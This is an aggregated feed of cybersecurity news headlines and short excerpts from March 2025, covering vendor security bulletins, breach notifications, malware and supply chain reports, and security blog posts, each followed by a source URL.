The ClamAV 1.5.0 beta is now available. You may find the source code and installers for this release at clamav.net/downloads or on the ClamAV GitHub release page. The beta phase is expected to last two to four weeks before we publish the stable release or else publish a release candidate. This will depend on how many changes are required to stabilize this version. Please take this time to evaluate ClamAV 1.5.0. Please help us validate this release by providing feedback via GitHub issues, via the ClamAV mailing list or on our Discord. IMPORTANT: A major feature of the 1.5 release is a FIPS-compliant method for verifying the authenticity of CVD signature database archives and CDIFF signature database patch files. The feature is ready to test in this beta, but we are not yet distributing the...
http://blog.clamav.net/2025/03/clamav-150-beta-now-available.html
Cyber Security and Resilience Policy Statement to strengthen regulation of critical sectors
New proposals will combat the growing threat to UK critical national infrastructure (CNI).
https://www.ncsc.gov.uk/blog-post/cyber-security-resilience-bill-policy-statement
Issue with AWS SAM CLI (CVE-2025-3047, CVE-2025-3048)
Publication Date: 2025/03/31 08:10 AM PDT
Description
The AWS Serverless Application Model Command Line Interface (AWS SAM CLI) is an open-source CLI tool that helps Lambda developers to build and develop Lambda applications locally on their computers using Docker.
We have identified the following issues within the AWS SAM CLI. A fix has been released and we recommend users upgrade to the latest version to address these issues. Additionally, users should ensure any forked or derivative code is patched to incorporate the new fixes.
CVE-2025-3047: When running the AWS SAM CLI build process with Docker and symlinks are included in the build files, the container environment allows a user to access privileged files on the host by leveraging the elevated permissions granted to...
https://aws.amazon.com/security/security-bulletins/AWS-2025-008/
Using Sonatype Nexus Repository with the new Docker Hub rate limits
Beginning April 1, 2025, Docker is going to introduce new pull rate limits in Docker Hub, which follow previous limits introduced in 2020. In this blog, we will discuss how Sonatype Nexus Repository can help you navigate Docker Hub's upcoming pull rate limits.
https://www.sonatype.com/blog/using-sonatype-nexus-repository-with-the-new-docker-hub-rate-limits
This month in security with Tony Anscombe – March 2025 edition
From an exploited vulnerability in a third-party ChatGPT tool to a bizarre twist on ransomware demands, it's a wrap on another month filled with impactful cybersecurity news
https://www.welivesecurity.com/en/videos/month-security-tony-anscombe-march-2025-edition/
How Each Pillar of the 1st Amendment is Under Attack
In an address to Congress this month, President Trump claimed he had "brought free speech back to America." But barely two months into his second term, the president has waged an unprecedented attack on the First Amendment rights of journalists, students, universities, government workers, lawyers and judges.
This story explores a slew of recent actions by the Trump administration that threaten to undermine all five pillars of the First Amendment to the U.S. Constitution, which guarantees freedoms concerning speech, religion, the media, the right to assembly, and the right to petition the government and seek redress for wrongs.
https://krebsonsecurity.com/2025/03/how-each-pillar-of-the-1st-amendment-is-under-attack/
German Doner Kebab - 162,373 breached accounts
In March 2025, data allegedly sourced from German Doner Kebab was published on a popular hacking forum. The data included 162k unique email addresses alongside names, phone numbers and physical addresses. German Doner Kebab subsequently sent a disclosure notice to impacted individuals.
https://haveibeenpwned.com/PwnedWebsites#GermanDonerKebab
Apache Tomcat RCE
What is the Vulnerability? On March 10, 2025, Apache issued a security advisory regarding a critical vulnerability (CVE-2025-24813) affecting the Apache Tomcat web server. This flaw could allow attackers to view or inject arbitrary content into security-sensitive files and potentially achieve remote code execution. Exploit code for this vulnerability is publicly available, and no authentication is required to launch an attack, making prompt mitigation essential. According to Apache, successful exploitation requires specific conditions, which may allow attackers to manipulate and view sensitive files or execute remote code. What is the recommended Mitigation? Impacted users should implement the recommended mitigations provided by Apache and follow the instructions outlined in the vendor's advisory: https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq-...
https://fortiguard.fortinet.com/threat-signal-report/6053
2025 Advanced Persistent Bot Report: Scraper Bots Deep-Dive
How much do scraper bots affect your industry?
https://www.f5.com/labs/articles/threat-intelligence/2025-advanced-persistent-bot-report-scraper-bots-deep-dive
Prevent Web Scraping by Applying the Pyramid of Pain
The Bots Pyramid of Pain: a framework for effective bot defense.
https://www.f5.com/labs/articles/threat-intelligence/prevent-web-scraping-by-applying-the-pyramid-of-pain
How SBOMs drive a smarter SCA strategy
Modern software is largely assembled from open source components, constituting up to 90% of today's codebases. Managing the security and compliance risks associated with this external code is no longer optional — it's a core part of software development.
https://www.sonatype.com/blog/how-sboms-drive-a-smarter-sca-strategy
2025 Advanced Persistent Bots Report
Uncovering the true scale of persistent bot activity, and the advanced techniques that bot operators use in order to remain hidden from bot defenses.
https://www.f5.com/labs/articles/threat-intelligence/2025-advanced-persistent-bots-report
The US Needs A New Cybersecurity Strategy: More Offensive Cyber Operations Isn't It
For a long time Chinese hackers have been operating in the grey area between espionage and warfare. The US has been struggling to defend its networks, but increasing offensive cyber operations is unlikely to help.
https://malwaretech.com/2025/03/the-us-needs-a-new-cybersecurity-strategy.html
Issue with tough, versions prior to 0.20.0 (Multiple CVEs)
Publication Date: 2025/03/27 02:30PM PDT
Description
The Update Framework (TUF) is a software framework designed to protect mechanisms that automatically identify and download updates to software. tough is a Rust client library for TUF repositories.
AWS is aware of the following issues within tough, versions prior to 0.20.0. On March 27, 2025, we released a fix in tough 0.20.0 and recommend customers upgrade to address these issues and ensure any forked or derivative code is patched to incorporate the new fixes.
CVE-2025-2885 relates to an issue with missing validation of the root metadata version number which could allow an actor to supply an unexpected version number to the client instead of the intended version in the root metadata file, altering the version fetched by...
https://aws.amazon.com/security/security-bulletins/AWS-2025-007/
New security requirements adopted by HTTPS certificate industry
Posted by Chrome Root Program, Chrome Security Team
The Chrome Root Program launched in 2022 as part of Google's ongoing commitment to upholding secure and reliable network connections in Chrome. We previously described how the Chrome Root Program keeps users safe, and described how the program is focused on promoting technologies and practices that strengthen the underlying security assurances provided by Transport Layer Security (TLS). Many of these initiatives are described on our forward looking, public roadmap named “Moving Forward, Together.”
At a high-level, “Moving Forward, Together” is our vision of the future. It is non-normative and considered distinct from the requirements detailed in the Chrome Root Program Policy. It's focused on themes that we feel are essential...
http://security.googleblog.com/2025/03/new-security-requirements-adopted-by.html
When Getting Phished Puts You in Mortal Danger
Many successful phishing attacks result in a financial loss or malware infection. But falling for some phishing scams, like those currently targeting Russians searching online for organizations that are fighting the Kremlin war machine, can cost you your freedom or your life.
https://krebsonsecurity.com/2025/03/when-getting-phished-puts-you-in-mortal-danger/
Multiple crypto packages hijacked, turned into info-stealers
Sonatype has identified multiple npm cryptocurrency packages, latest versions of which have been hijacked and altered to steal sensitive information such as environment variables from the target victims.
https://www.sonatype.com/blog/multiple-crypto-packages-hijacked-turned-into-info-stealers
Cloud Threats on the Rise: Alert Trends Show Intensified Attacker Focus on IAM, Exfiltration
Understanding trends amidst noise: tracking shifts in security alerts allows cloud defenders to parse threats from attackers targeting IAM, storage and more.
The post Cloud Threats on the Rise: Alert Trends Show Intensified Attacker Focus on IAM, Exfiltration appeared first on Unit 42.
https://unit42.paloaltonetworks.com/2025-cloud-security-alert-trends/
Advance notice: End of Life for ClamAV 0.103 database updates
ClamAV version 0.103 will reach its end of life (EOL) for database updates on September 14, 2025. After this date, this version will no longer receive the latest virus definitions. To ensure your systems remain protected, please upgrade to the latest supported version of ClamAV before the end-of-life date. This will provide continued access to essential security updates and features. We recommend that users update to the newest release, ClamAV 1.4 LTS. For users that are unable to upgrade to version 1.4, you may find that ClamAV 1.0 LTS is more suitable. The most recent version of ClamAV can be found on the ClamAV Downloads page, on the ClamAV GitHub Releases page, and through Docker Hub. Information about how to install ClamAV is available in our online documentation. The...
http://blog.clamav.net/2025/03/advance-notice-end-of-life-for-clamav.html
Legit Announces New Vulnerability Prevention Capabilities
Get details on Legit's new capabilities that allow AppSec teams to prevent introducing vulnerabilities.
https://www.legitsecurity.com/blog/legit-announces-new-vulnerability-prevention-capabilities
Blasting Past Webp
An analysis of the NSO BLASTPASS iMessage exploit
Posted by Ian Beer, Google Project Zero
On September 7, 2023 Apple issued an out-of-band security update for iOS:
Around the same time on September 7th 2023, Citizen Lab published a blog post linking the two CVEs fixed in iOS 16.6.1 to an "NSO Group Zero-Click, Zero-Day exploit captured in the wild":
"[The target was] an individual employed by a Washington DC-based civil society organization with international offices...
The exploit chain was capable of compromising iPhones running the latest version of iOS (16.6) without any interaction from the victim.
The exploit involved PassKit attachments containing malicious images sent from an attacker iMessage account to the victim."
The day before,...
https://googleprojectzero.blogspot.com/2025/03/blasting-past-webp.html
Titan Security Keys now available in more countries
Posted by Christiaan Brand, Group Product Manager
We're excited to announce that starting today, Titan Security Keys are available for purchase in more than 10 new countries: Ireland, Portugal, The Netherlands, Denmark, Norway, Sweden, Finland, Australia, New Zealand, Singapore and Puerto Rico. This expansion means Titan Security Keys are now available in 22 markets, including previously announced countries like Austria, Belgium, Canada, France, Germany, Italy, Japan, Spain, Switzerland, the UK, and the US.
What is a Titan Security Key?
A Titan Security Key is a small, physical device that you can use to verify your identity when you sign in to your Google Account. It's like a second password that's much harder for cybercriminals to steal. Titan Security Keys allow you to store your passkeys on a strong, purpose-built...
http://security.googleblog.com/2025/03/titan-security-keys-now-available-in.html
GitHub Actions Supply Chain Attack
What is the Attack? Recently, a popular third-party GitHub Action tj-actions/changed-files (CVE-2025-30066), used by over 23,000 repositories, was compromised, potentially exposing sensitive workflow secrets in any pipeline that integrated it. Subsequent investigation revealed that the compromise of tj-actions/changed-files may be linked to a similar breach of another GitHub Action, reviewdog/action-setup@v1 (CVE-2025-30154). Multiple Reviewdog actions were affected during a specific timeframe, raising further concerns about the scope of the attack. (CVE-2025-30154 · GitHub Advisory Database) GitHub Actions, a widely used CI/CD platform, enables developers to automate software development pipelines with reusable workflow components. The supply chain compromise in this case poses a serious security...
https://fortiguard.fortinet.com/threat-signal-report/6052
CodeQLEAKED - CodeQL Supply Chain Attack via Exposed Secret
A publicly exposed GitHub token in CodeQL workflow artifacts could allow attackers to execute malicious code
in repositories using CodeQL, potentially leading to source code exfiltration, secrets compromise, and supply
chain attacks. The vulnerability stemmed from a debug artifact containing environment variables, which could be
downloaded and exploited within a 1-2 second window.
https://www.cloudvulndb.org/codeql-supply-chain-attack-exposed-secret
BlueSky InfoSec News List
Hello all, happy Tuesday. I’ve migrated my cybersecurity news feed list to BlueSky and it can now be found here: https://web-cdn.bsky.app/profile/hacks4pancakes.com/lists/3ll6ownhbuz2o I hope you find this useful. If you’re using Mastodon, the import process is a bit more manual: @Updated InfoSec Mastodon Lists!
https://tisiphone.net/2025/03/25/bluesky-infosec-news-list/
Troy Hunt's Mailchimp List - 16,627 breached accounts
In March 2025, a phishing attack successfully gained access to Troy Hunt's Mailchimp account and automatically exported a list of people who had subscribed to the newsletter for his personal blog. The exported list contained 16k email addresses and other data automatically collected by Mailchimp including IP address and a derived latitude, longitude and time zone.
https://haveibeenpwned.com/PwnedWebsites#TroyHuntMailchimpList
Issues with Kubernetes ingress-nginx controller (Multiple CVEs)
Publication Date: 2025/03/24 09:00AM PDT
Description
Ingress Controllers are applications within a Kubernetes cluster that enable Ingress resources to function.
AWS is aware of CVE-2025-1098, CVE-2025-1974, CVE-2025-1097, CVE-2025-24514, and CVE-2025-24513, which affect the Kubernetes ingress-nginx controller. Amazon Elastic Kubernetes Service (Amazon EKS) does not provide or install the ingress-nginx controller and is not affected by these issues. Customers who have installed this controller on their clusters should update to the latest version.
We have proactively notified customers who were identified as having this controller installed.
References:
CVE-2025-1098 - GitHub Issue
CVE-2025-1974 - GitHub Issue
CVE-2025-1097 - GitHub Issue
CVE-2025-24514 - GitHub Issue...
https://aws.amazon.com/security/security-bulletins/AWS-2025-006/
Next.js Vulnerability: What You Need to Know
Get details on this recent vulnerability, how to respond, and how Legit can help.
https://www.legitsecurity.com/blog/next-js-vulnerability-what-you-need-to-know
A maintainer's guide to vulnerability disclosure: GitHub tools to make it simple
A step-by-step guide for open source maintainers on how to handle vulnerability reports confidently from the start.
The post A maintainer’s guide to vulnerability disclosure: GitHub tools to make it simple appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/a-maintainers-guide-to-vulnerability-disclosure-github-tools-to-make-it-simple/
CyberFirst Girls Competition: a proud milestone and exciting future
The future of the CyberFirst Girls Competition and reflecting on brilliant progress.
https://www.ncsc.gov.uk/blog-post/cyberfirst-girls-competition-milestone-future
Privileged access workstations: introducing our new set of principles
Principles-based guidance for organisations setting up a PAW solution.
https://www.ncsc.gov.uk/blog-post/introducing-new-paws-principles
Passkeys: they're not perfect but they're getting better
Passkeys are the future of authentication, offering enhanced security and convenience over passwords, but widespread adoption faces challenges that the NCSC is working to resolve.
https://www.ncsc.gov.uk/blog-post/passkeys-not-perfect-getting-better
Passkeys: the promise of a simpler and safer alternative to passwords
The merits of choosing passkeys over passwords to help keep your online accounts more secure, and explaining how the technology promises to do this
https://www.ncsc.gov.uk/blog-post/passkeys-promise-simpler-alternative-passwords
Arrests in Tap-to-Pay Scheme Powered by Phishing
Authorities in at least two U.S. states last week independently announced arrests of Chinese nationals accused of perpetrating a novel form of tap-to-pay fraud using mobile devices. Details released by authorities so far indicate the mobile wallets being used by the scammers were created through online phishing scams, and that the accused were relying on a custom Android app to relay tap-to-pay transactions from mobile devices located in China.
https://krebsonsecurity.com/2025/03/arrests-in-tap-to-pay-scheme-powered-by-phishing/
The Human Factor: Redefining Cybersecurity In The Age Of AI
https://www.proofpoint.com/us/newsroom/news/human-factor-redefining-cybersecurity-age-ai
Issue with the AWS CDK CLI and custom credential plugins (CVE-2025-2598)
Publication Date: 2025/03/21 07:00 AM PDT
Description
AWS identified CVE-2025-2598, an issue in the AWS Cloud Development Kit (AWS CDK) Command Line Interface (AWS CDK CLI), versions 2.172.0 through 2.178.1. The AWS CDK CLI is a command line tool that deploys AWS CDK applications onto AWS accounts.
When customers run AWS CDK CLI commands with credential plugins and configure those plugins to return temporary credentials by including an expiration property, this issue can potentially result in the AWS credentials retrieved by the plugin being printed to the console output. Any user with access to where the CDK CLI was run would have access to this output. We have released a fix for this issue and recommend customers upgrade to version 2.178.2 or later to address this issue....
https://aws.amazon.com/security/security-bulletins/AWS-2025-005/
Analyzing the Global Increase in Vulnerability Scanning in 2024
BotPoke comes to the foreground yet again.
https://www.f5.com/labs/articles/threat-intelligence/analyzing-the-global-increase-in-vulnerability-scanning-in-2024
GitHub Actions Supply Chain Attack: A Targeted Attack on Coinbase Expanded to the Widespread tj-actions/changed-files Incident: Threat Assessment (Updated 4/2)
A compromise of the GitHub action tj-actions/changed-files highlights how attackers could exploit vulnerabilities in third-party actions to compromise supply chains.
The post GitHub Actions Supply Chain Attack: A Targeted Attack on Coinbase Expanded to the Widespread tj-actions/changed-files Incident: Threat Assessment (Updated 4/2) appeared first on Unit 42.
https://unit42.paloaltonetworks.com/github-actions-supply-chain-attack/
Timelines for migration to post-quantum cryptography
Activities which organisations must carry out to migrate safely to post-quantum cryptography in the coming years.
https://www.ncsc.gov.uk/guidance/pqc-migration-timelines
Setting direction for the UK's migration to post-quantum cryptography
Why the key milestones for PQC migration are part of building and maintaining good cyber security practice.
https://www.ncsc.gov.uk/blog-post/setting-direction-uk-migration-to-pqc
Bypassing Web Filters Part 4: Host Header Spoofing & Domain Fronting Detection Bypasses
In the previous posts of this series, we looked at different ways to bypass web filters, such as Host header spoofing and domain fronting. As we’ve learned, these techniques can be detected by proxies employing TLS inspection, by checking whether the hostname in the SNI matches the one in the HTTP Host header. If they […]
https://blog.compass-security.com/2025/03/bypassing-web-filters-part-4-host-header-spoofing-domain-fronting-detection-bypasses/
Yes, That's Me on Your Radio!
I had the honor of another short segment on NPR’s Marketplace this morning. I spoke about the state of cyber crime, and the impact of US government changes on cyber defense.
https://tisiphone.net/2025/03/19/yes-thats-me-on-your-radio/
SpyX - 1,977,011 breached accounts
In June 2024, spyware maker SpyX suffered a data breach that exposed almost 2M unique email addresses. The breach also exposed IP addresses, countries of residence, device information and 6-digit PINs in the password field. Further, a collection of iCloud credentials likely used to monitor targets directly via the cloud were also in the breach and contained the target's email address and plain text Apple password.
https://haveibeenpwned.com/PwnedWebsites#SpyX
Updated InfoSec Mastodon Lists!
I have been asked for these, so here they are! I hope you find these useful in following more Fediverse cybersecurity stuff.
https://tisiphone.net/2025/03/18/updated-infosec-mastodon-lists/
Lexipol - 672,546 breached accounts
In February 2025, the public safety policy management systems company Lexipol suffered a data breach. Attributed to the self-proclaimed "Puppygirl Hacker Polycule", the breach exposed an extensive number of documents and user records which were subsequently published publicly. The breach included over 670k unique email addresses in the user records, along with names, phone numbers, system-generated usernames and passwords stored as either MD5 or SHA-256 hashes.
https://haveibeenpwned.com/PwnedWebsites#Lexipol
Github Actions tj-actions/changed-files Attack
Get details on this recent supply chain attack and how to prevent similar attacks in the future.
https://www.legitsecurity.com/blog/github-actions-tj-actions-changed-files-attack
Hundreds of Malicious Google Play-Hosted Apps Bypassed Android 13 Security With Ease
Bitdefender's security researchers have identified a large-scale ad fraud campaign that deployed hundreds of malicious apps in the Google Play Store, resulting in more than 60 million downloads total. The apps display out-of-context ads and even try to persuade victims to give away credentials and credit card information in phishing attacks.
The Google Play Store is often targeted by cybercriminals trying to upload malicious apps by bypassing existing protections. Google purges the store of suc
https://www.bitdefender.com/en-us/blog/labs/malicious-google-play-apps-bypassed-android-security
Bypassing Web Filters Part 3: Domain Fronting
The last two blog posts in this series were about SNI spoofing and Host header spoofing. We also learned that the latter is addressed by some vendors with a technique called "Domain Fronting Detection". But what exactly is domain fronting? This will be explained in this blog post.
https://blog.compass-security.com/2025/03/bypassing-web-filters-part-3-domain-fronting/
Announcing OSV-Scanner V2: Vulnerability scanner and remediation tool for open source
Posted by Rex Pan and Xueqin Cui, Google Open Source Security Team
In December 2022, we released the open source OSV-Scanner tool, and earlier this year, we open sourced OSV-SCALIBR. OSV-Scanner and OSV-SCALIBR, together with OSV.dev, are components of an open platform for managing vulnerability metadata and enabling simple and accurate matching and remediation of known vulnerabilities. Our goal is to simplify and streamline vulnerability management for developers and security teams alike. Today, we're thrilled to announce the launch of OSV-Scanner V2.0.0, following the announcement of the beta version. This V2 release builds upon the foundation we laid with OSV-SCALIBR and adds significant new capabilities to OSV-Scanner, making it a comprehensive vulnerability scanner and remediation tool with...
http://security.googleblog.com/2025/03/announcing-osv-scanner-v2-vulnerability.html
Off the Beaten Path: Recent Unusual Malware
Three unusual malware samples analyzed here include an ISS backdoor developed in a rare language, a bootkit and a Windows implant of a post-exploit framework.
The post Off the Beaten Path: Recent Unusual Malware appeared first on Unit 42.
https://unit42.paloaltonetworks.com/unusual-malware/
Why Critical MongoDB Library Flaws Won't See Mass Exploitation
Discover how to mitigate CVE-2024-53900 and CVE-2025-23061, which expose Node.js APIs to remote attacks.
https://www.f5.com/labs/articles/threat-intelligence/why-critical-mongodb-library-flaws-wont-see-mass-exploitation
Investigating Scam Crypto Investment Platforms Using Pyramid Schemes to Defraud Victims
We identified a campaign spreading thousands of scam crypto investment platforms through websites and mobile apps, possibly through a standardized toolkit.
The post Investigating Scam Crypto Investment Platforms Using Pyramid Schemes to Defraud Victims appeared first on Unit 42.
https://unit42.paloaltonetworks.com/fraud-crypto-platforms-campaign/
Bypassing Web Filters Part 2: Host Header Spoofing
In the last post about bypassing web filters, I discussed how SNI spoofing works and how this can also be prevented by web filters. This post is about another bypass technique called Host Header spoofing.
https://blog.compass-security.com/2025/03/bypassing-web-filters-part-2-host-header-spoofing/
Sign in as anyone: Bypassing SAML SSO authentication with parser differentials
Critical authentication bypass vulnerabilities (CVE-2025-25291 + CVE-2025-25292) were discovered in ruby-saml up to version 1.17.0. In this blog post, we'll shed light on how these vulnerabilities that rely on a parser differential were uncovered.
The post Sign in as anyone: Bypassing SAML SSO authentication with parser differentials appeared first on The GitHub Blog.
https://github.blog/security/sign-in-as-anyone-bypassing-saml-sso-authentication-with-parser-differentials/
Bypassing Web Filters Part 1: SNI Spoofing
This is the first part of a series of blog posts about techniques to bypass web filters, looking at increasingly advanced techniques with each part.
The first part is about how SNI spoofing can be used to bypass web filters.
https://blog.compass-security.com/2025/03/bypassing-web-filters-part-1-sni-spoofing/
VMware Multiple Products Zero-day Vulnerabilities
What is the Vulnerability? Multiple zero-day vulnerabilities have been identified in VMware's ESXi, Workstation, and Fusion products. VMware has confirmed that these vulnerabilities are being actively exploited in the wild, and the Cybersecurity and Infrastructure Security Agency (CISA) has included them in its Known Exploited Vulnerabilities Catalog due to evidence of such exploitation. The vendor advisory indicates that these vulnerabilities were reported to VMware by the Microsoft Threat Intelligence Center.
• CVE-2025-22225: Arbitrary Write Vulnerability in VMware ESXi
• CVE-2025-22224: TOCTOU Race Condition Vulnerability in VMware ESXi and Workstation
• CVE-2025-22226: Information Disclosure Vulnerability in VMware ESXi, Workstation, and Fusion
What is the recommended Mitigation? Updates...
https://fortiguard.fortinet.com/threat-signal-report/6026
Full exposure: A practical approach to handling sensitive data leaks
Treating exposures as full and complete can help you respond more effectively to focus on what truly matters: securing systems, protecting sensitive data, and maintaining the trust of stakeholders.
The post Full exposure: A practical approach to handling sensitive data leaks appeared first on The GitHub Blog.
https://github.blog/security/full-exposure-a-practical-approach-to-handling-sensitive-data-leaks/
Vulnerability Reward Program: 2024 in Review
Posted by Dirk Göhmann
In 2024, our Vulnerability Reward Program confirmed the ongoing value of engaging with the security research community to make Google and its products safer. This was evident as we awarded just shy of million to over 600 researchers based in countries around the globe across all of our programs.
Vulnerability Reward Program 2024 in Numbers
You can learn about who's reporting to the Vulnerability Reward Program via our Leaderboard – and find out more about our youngest security researchers who've recently joined the ranks of Google bug hunters.
VRP Highlights in 2024
In 2024 we made a series of changes and improvements coming to our vulnerability reward programs and related initiatives: The Google VRP revamped its reward structure, bumping rewards up to a maximum...
http://security.googleblog.com/2025/03/vulnerability-reward-program-2024-in.html
Legit SLA Management & Governance – Built for Enterprise-Scale AppSec
Get details on Legit's powerful SLA management capabilities.
https://www.legitsecurity.com/blog/legit-sla-management-and-governance
Enterprises Should Consider Replacing Employees' Home TP-Link Routers
An examination of CVE trends from February 2025 scanning data.
https://www.f5.com/labs/articles/threat-intelligence/enterprises-should-consider-replacing-employees-home-tp-link-routers
Citrix NetScaler ADC and NetScaler Gateway Unauthenticated Remote Code Execution Vulnerability (CVE-2023-3519)
What is Citrix NetScaler ADC and NetScaler Gateway?
Citrix NetScaler ADC, previously known as Citrix ADC, is an Application Delivery Controller (ADC) designed to achieve secure and optimized network traffic. Citrix NetScaler Gateway, previously known as Citrix Gateway, is an SSL-VPN solution designed to provide secure and optimized remote access.
What is the Attack?
According to the advisory published by Citrix, CVE-2023-3519 is an unauthenticated remote code execution vulnerability that affects the unmitigated Citrix NetScaler ADC and NetScaler Gateway products. For these products to be vulnerable, they must be configured either as a gateway or as an authentication, authorization, and auditing (AAA) virtual server. The advisory also confirms that Citrix-managed servers have already been mitigated,...
https://fortiguard.fortinet.com/threat-signal-report/5227
November 2024 Cyber Attacks Statistics
In November 2024, Cyber Crime continued to lead the Motivations chart with 72%, up from 68% of October. Operations driven...
https://www.hackmageddon.com/2025/03/05/november-2024-cyber-attacks-statistics/
Issue with Temporary elevated access management (TEAM) - CVE-2025-1969
Publication Date: 2025/03/04 10:30 AM PST
Description
Improper request input validation in Temporary Elevated Access Management (TEAM) for AWS IAM Identity Center allows a user to modify a valid request and spoof an approval in TEAM. We recommend customers upgrade TEAM to the latest release, version 1.2.2.
Affected versions: <1.2.2
Resolution
A fix has been released in version 1.2.2.
Please refer to the "Update TEAM solution" documentation for instructions on upgrading.
References
GHSA-x9xv-r58p-qh86
CVE-2025-1969
Acknowledgement
We would like to thank Redshift Cyber Security for collaborating on this issue through the coordinated vulnerability disclosure process.
Please email aws-security@amazon.com with any security questions or concerns....
https://aws.amazon.com/security/security-bulletins/AWS-2025-004/
New AI-Powered Scam Detection Features to Help Protect You on Android
Posted by Lyubov Farafonova, Product Manager, Phone by Google; Alberto Pastor Nieto, Sr. Product Manager Google Messages and RCS Spam and Abuse
Google has been at the forefront of protecting users from the ever-growing threat of scams and fraud with cutting-edge technologies and security expertise for years. In 2024, scammers used increasingly sophisticated tactics and generative AI-powered tools to steal more than trillion from mobile consumers globally, according to the Global Anti-Scam Alliance. And with the majority of scams now delivered through phone calls and text messages, we've been focused on making Android's safeguards even more intelligent with powerful Google AI to help keep your financial information and data safe.
Today, we're launching two new industry-leading...
http://security.googleblog.com/2025/03/new-ai-powered-scam-detection-features.html
Color Dating - 220,503 breached accounts
In September 2018, Color Dating, a dating app for matching people of different ethnicities, suffered a data breach that was later redistributed as part of a larger corpus of data. The breach exposed 220k unique email addresses along with bios, names, profile photos and bcrypt password hashes. The data was provided to HIBP by a source who requested it be attributed to "ANK (Veles)".
https://haveibeenpwned.com/PwnedWebsites#ColorDating
Flat Earth Sun, Moon and Zodiac App - 33,294 breached accounts
In October 2024, the flat earth sun, moon and zodiac app created by Flat Earth Dave was found to be leaking extensive personal information of its users. The data included 33k unique email addresses along with usernames, latitudes and longitudes (their position on the globe) and passwords stored in plain text. A small number of profiles also contained names, dates of birth and genders.
https://haveibeenpwned.com/PwnedWebsites#FlatEarthDave
Spyzie - 518,643 breached accounts
In February 2025, the spyware service Spyzie suffered a data breach along with sibling spyware services, Spyic and Cocospy. The Spyzie breach alone exposed almost 519k customer email addresses which were provided to HIBP, and reportedly also enabled unauthorised access to captured messages, photos, call logs, and more. The data was provided to HIBP by a source who requested it be attributed to "zathienaephi@proton.me".
https://haveibeenpwned.com/PwnedWebsites#Spyzie
16-30 November 2024 Cyber Attacks Timeline
In the second timeline of November 2024 I collected 117 events (7.8 events/day) with a threat landscape dominated by malware
https://www.hackmageddon.com/2025/02/27/16-30-november-2024-cyber-attacks-timeline/
Orange Romania - 556,557 breached accounts
In February 2025, the Romanian arm of telecommunications company Orange suffered a data breach which was subsequently published to a popular hacking forum. The data included 556k email addresses (of which hundreds of thousands were in the form of [phone number]@as1.romtelecom.net), phone numbers, subscription details, partial credit card data (type, last 4 digits, expiration date and issuing bank). The breach also exposed an extensive number of internal documents.
https://haveibeenpwned.com/PwnedWebsites#OrangeRomania
Why AI Can't Replace Cybersecurity Analysts
As we face an extreme downturn in cybersecurity hiring which entry level candidates bear the brunt of, I want to address an elephant in the room: AI. I spend a lot of my time providing career clinics and mentorship, and I truly understand this is one of the worst cybersecurity job markets for young people […]
https://tisiphone.net/2025/02/26/why-ai-cant-replace-cybersecurity-analysts/
The Phillip Wylie Show!
I made an appearance on the wonderful Phillip Wylie show! It was incredibly kind of him to have me on. We talked about a kind of niche area of ICS – how to do digital forensics in that space – especially weird and legacy stuff – and what that actually means during incident response. Check […]
https://tisiphone.net/2025/02/26/the-phillip-wylie-show/
Celebrating 1 Year of CSF 2.0
It has been one year since the release of the NIST Cybersecurity Framework (CSF) 2.0! To make improving your security posture even easier, in this blog we are: sharing new CSF 2.0 resources; taking a retrospective look at some resources and applications you may have missed; and highlighting ways you can stay involved in our work, helping us help you implement better cybersecurity. NIST's subject matter experts have worked over the last year to continue expanding the CSF 2.0 implementation resources to help you secure your enterprise. Stakeholders are a very important force behind NIST's
https://www.nist.gov/blogs/cybersecurity-insights/celebrating-1-year-csf-20
Silent Reaper (Azure LogicApp Secrets Control Plane Exfiltration)
Azure iPaaS services, such as Logic Apps, separate the Control Plane (management) from the Data Plane (execution), but a flaw in this model enabled undetectable data harvesting.
An attacker with Azure Reader access to workflow run history can silently extract sensitive data from executions, including secrets and API responses. This is possible because execution details are exposed via the Control Plane, bypassing Data Plane access controls.
The root cause of this issue is the unintended exposure of runtime data through metadata endpoints, which could allow an attacker to passively collect information without triggering alerts or requiring direct execution privileges.
https://www.cloudvulndb.org/azure-logic-apps-secrets-control-plane-exfiltration
Vault Recon (Azure KeyVault Secrets Metadata Control Plane Exfiltration)
Azure Key Vault enforces a separation between the Control Plane (management) and Data Plane (secrets access). However, a flaw in this isolation allows unauthorized users to enumerate secrets and keys within a vault.
By having Reader access or lesser privileges on a Key Vault, an attacker could leverage Azure Resource Explorer to access metadata about stored secrets. This is due to unintended exposure through the Control Plane, which should not provide insight into Data Plane resources.
The root cause of this issue is insufficient isolation between the two planes, where metadata retrieval is permitted even when direct access to secrets is restricted. This allows attackers to gain information about sensitive assets without full permissions.
https://www.cloudvulndb.org/azure-vault-recon-keyvault-secret-metadata-control-plane-exfiltration
Securing tomorrow's software: the need for memory safety standards
Posted by Alex Rebert, Security Foundations, Ben Laurie, Research, Murali Vijayaraghavan, Research and Alex Richardson, Silicon
For decades, memory safety vulnerabilities have been at the center of various security incidents across the industry, eroding trust in technology and costing billions. Traditional approaches, like code auditing, fuzzing, and exploit mitigations – while helpful – haven't been enough to stem the tide, while incurring an increasingly high cost. In this blog post, we are calling for a fundamental shift: a collective commitment to finally eliminate this class of vulnerabilities, anchored on secure-by-design practices – not just for ourselves but for the generations that follow. The shift we are calling for is reinforced by a recent ACM article calling to standardize...
http://security.googleblog.com/2025/02/securing-tomorrows-software-need-for.html
ALIEN TXTBASE Stealer Logs - 284,132,969 breached accounts
In February 2025, 23 billion rows of stealer logs were obtained from a Telegram channel known as ALIEN TXTBASE. The data contained 284M unique email addresses alongside the websites they were entered into and the passwords used. This data is now searchable in HIBP by both email domain and the domain of the target website.
https://haveibeenpwned.com/PwnedWebsites#AlienStealerLogs
Passkeys
Don't we all know the hassle of managing loads of passwords, trying to come up with secure and unique ones only to try afterwards to remember them? Or always staying on high alert whether the URL is definitely the valid one for the website we are trying to visit?
What if all this could be over soon?
Welcome to Passkeys!
https://blog.compass-security.com/2025/02/passkeys/
2024 Vulnerability Scanning Surges 91%
Scans intensify, looking for a critical vulnerability in TBK DVR devices.
https://www.f5.com/labs/articles/threat-intelligence/2024-vulnerability-scanning-surges-91
Out with the Old, In with the Bold: Gen Threat Labs
For years, Avast Decoded has been your go-to for the latest in cybersecurity insights and research. But as cybercriminals evolve, so do we. Starting now, our groundbreaking research, expert analysis and the stories that keep the digital world safe are moving to one place: the Gen Insights Blog. By uniting our expertise under the Gen […]
The post Out with the Old, In with the Bold: Gen Threat Labs appeared first on Avast Threat Labs.
